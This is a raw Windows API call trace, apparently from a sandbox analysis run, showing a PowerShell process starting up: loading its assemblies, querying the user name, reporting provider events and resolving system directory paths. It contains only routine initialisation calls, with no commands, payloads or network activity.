	[0327.546] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0327.546] GetUserNameW (in: lpBuffer=0x35c680, pcbBuffer=0x1cd6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd6e8) returned 1
	[0327.547] CoTaskMemFree (pv=0x35c680) 
	[0327.547] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f022b8*="Registry", lpRawData=0x2f02048) returned 1
	[0328.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.027] CoTaskMemAlloc (cb=0x804) returned 0x1b42c3e0
	[0328.027] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b42c3e0, nSize=0x1cd6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd6a8) returned 0x1
	[0328.027] CoTaskMemFree (pv=0x1b42c3e0) 
	[0328.027] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0328.027] GetUserNameW (in: lpBuffer=0x35c680, pcbBuffer=0x1cd6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd6e8) returned 1
	[0328.028] CoTaskMemFree (pv=0x35c680) 
	[0328.028] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f076d0*="Variable", lpRawData=0x2f07460) returned 1
	[0328.029] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0328.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.030] CoTaskMemFree (pv=0x3d2560) 
	[0328.032] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0328.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.032] CoTaskMemFree (pv=0x3d2560) 
	[0328.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0328.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0328.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0328.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0328.569] CoTaskMemAlloc (cb=0x804) returned 0x1b418520
	[0328.569] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b418520, nSize=0x1cd6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd6a8) returned 0x1
	[0328.569] CoTaskMemFree (pv=0x1b418520) 
	[0328.569] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0328.569] GetUserNameW (in: lpBuffer=0x35c680, pcbBuffer=0x1cd6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd6e8) returned 1
	[0328.569] CoTaskMemFree (pv=0x35c680) 
	[0328.570] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f1b2e8*="Certificate", lpRawData=0x2f1b078) returned 1
	[0329.029] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0329.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.029] CoTaskMemFree (pv=0x3d2560) 
	[0329.032] GetLogicalDrives () returned 0x4
	[0329.032] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0329.033] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0329.034] CoTaskMemAlloc (cb=0x20e) returned 0x3b84c0
	[0329.034] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3b84c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0329.034] CoTaskMemFree (pv=0x3b84c0) 
	[0329.035] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0329.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.036] CoTaskMemFree (pv=0x3d2560) 
	[0329.036] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0329.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.036] CoTaskMemFree (pv=0x3d2560) 
	[0329.050] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0329.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.051] CoTaskMemFree (pv=0x3d2560) 
	[0329.052] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0329.052] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.052] CoTaskMemFree (pv=0x3d2560) 
	[0329.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0329.053] SetErrorMode (uMode=0x1) returned 0x1
	[0329.053] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd2f0 | out: lpFileInformation=0x1cd2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0329.053] SetErrorMode (uMode=0x1) returned 0x1
	[0329.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0329.053] SetErrorMode (uMode=0x1) returned 0x1
	[0329.053] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd2f0 | out: lpFileInformation=0x1cd2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0329.053] SetErrorMode (uMode=0x1) returned 0x1
	[0329.054] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0329.054] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.055] CoTaskMemFree (pv=0x3d2560) 
	[0329.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0329.060] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0329.060] SetErrorMode (uMode=0x1) returned 0x1
	[0329.060] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd2b0 | out: lpFileInformation=0x1cd2b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0329.060] SetErrorMode (uMode=0x1) returned 0x1
	[0329.060] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0329.060] SetErrorMode (uMode=0x1) returned 0x1
	[0329.060] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd2b0 | out: lpFileInformation=0x1cd2b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0329.060] SetErrorMode (uMode=0x1) returned 0x1
	[0329.061] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0329.061] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0329.061] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0329.061] SetErrorMode (uMode=0x1) returned 0x1
	[0329.061] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd2b0 | out: lpFileInformation=0x1cd2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0329.061] SetErrorMode (uMode=0x1) returned 0x1
	[0329.061] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0329.061] SetErrorMode (uMode=0x1) returned 0x1
	[0329.061] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd2b0 | out: lpFileInformation=0x1cd2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0329.062] SetErrorMode (uMode=0x1) returned 0x1
	[0329.062] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0329.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0329.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0329.062] SetErrorMode (uMode=0x1) returned 0x1
	[0329.062] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd2b0 | out: lpFileInformation=0x1cd2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0329.062] SetErrorMode (uMode=0x1) returned 0x1
	[0329.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0329.063] SetErrorMode (uMode=0x1) returned 0x1
	[0329.063] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd2b0 | out: lpFileInformation=0x1cd2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0329.063] SetErrorMode (uMode=0x1) returned 0x1
	[0329.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0329.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ccfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0329.063] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0329.063] SetErrorMode (uMode=0x1) returned 0x1
	[0329.064] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd2f0 | out: lpFileInformation=0x1cd2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0329.064] SetErrorMode (uMode=0x1) returned 0x1
	[0329.064] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0329.064] SetErrorMode (uMode=0x1) returned 0x1
	[0329.064] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd2f0 | out: lpFileInformation=0x1cd2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0329.064] SetErrorMode (uMode=0x1) returned 0x1
	[0329.064] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0329.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0329.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0329.064] SetErrorMode (uMode=0x1) returned 0x1
	[0329.064] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd2f0 | out: lpFileInformation=0x1cd2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0329.065] SetErrorMode (uMode=0x1) returned 0x1
	[0329.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0329.065] SetErrorMode (uMode=0x1) returned 0x1
	[0329.065] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd2f0 | out: lpFileInformation=0x1cd2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0329.065] SetErrorMode (uMode=0x1) returned 0x1
	[0329.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0329.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0329.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0329.067] SetErrorMode (uMode=0x1) returned 0x1
	[0329.067] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd5b0 | out: lpFileInformation=0x1cd5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0329.067] SetErrorMode (uMode=0x1) returned 0x1
	[0329.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0329.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0329.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0329.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.253] CoTaskMemAlloc (cb=0x804) returned 0x1b418520
	[0330.253] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b418520, nSize=0x1cd918 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd918) returned 0x1
	[0330.253] CoTaskMemFree (pv=0x1b418520) 
	[0330.253] CoTaskMemAlloc (cb=0x204) returned 0x35c680
	[0330.253] GetUserNameW (in: lpBuffer=0x35c680, pcbBuffer=0x1cd958 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd958) returned 1
	[0330.254] CoTaskMemFree (pv=0x35c680) 
	[0330.262] ReportEventW (hEventLog=0x1b890008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f53fd0*="Available", lpRawData=0x2f53d60) returned 1
	[0330.911] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0330.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.911] CoTaskMemFree (pv=0x3d2560) 
	[0330.912] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0330.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.912] CoTaskMemFree (pv=0x3d2560) 
	[0330.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.915] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
	[0330.915] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3d2560, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0330.915] CoTaskMemFree (pv=0x3d2560) 
	[0330.915] CoTaskMemAlloc (cb=0x104) returned 0x3d2560
